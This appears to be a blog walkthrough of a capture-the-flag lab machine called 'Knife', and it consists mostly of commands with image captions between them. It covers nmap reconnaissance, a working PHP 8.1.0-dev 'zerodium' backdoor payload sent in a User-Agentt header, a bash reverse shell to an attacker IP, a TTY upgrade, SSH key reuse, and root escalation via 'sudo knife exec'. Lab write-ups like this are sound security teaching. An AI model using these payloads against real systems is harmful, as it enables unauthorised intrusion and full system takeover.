root@blog:~#

View on GitHub

knife

RECON

Medical Website

recon

Nmap Scan

nmap -sC -sV 10.10.10.242

nmap

PHP Website

php site

Inspecting Network Properties reveals PHP 8.1.0

php8

PHP Exploit exploit

exploit info

ENUMERATION

Netcat listner

nc -lvnp 80

nc

Burp Repeater

 User-Agentt: zerodiumsystem('usr/bin/curl 10.10.14.4');

zerodium

Curl Success

curld

Open second listner

nc -lvnp 4444

n4444

Reverse Shell

 User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'");

exp

Success user James

user

TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg
press ENTER twice
export TERM=xterm

xterm

User Flag

usertxt

PRIVILEGE ESCALATION

SSH Direcotry RSA Key

cd .ssh
ls

rsa

Send it to authorized keys

cat id_rsa.pub > authorized_keys

authkey

Copy Paste to Local Machine

nano id_rsa

copyrsa

chmod 600 id_ra

chmod

SSH

ssh -i id_rsa james@10.10.10.242

box

Sudo Commands

Running Chef

knifed

Knife Command

exec

GTFO Bins

Bypasses Security

gtfobin

kniffe

sudo knife exec -E 'exec "/bin/sh"'

cmd

ROOT Flag

id

rooted

cd root
ls

rooot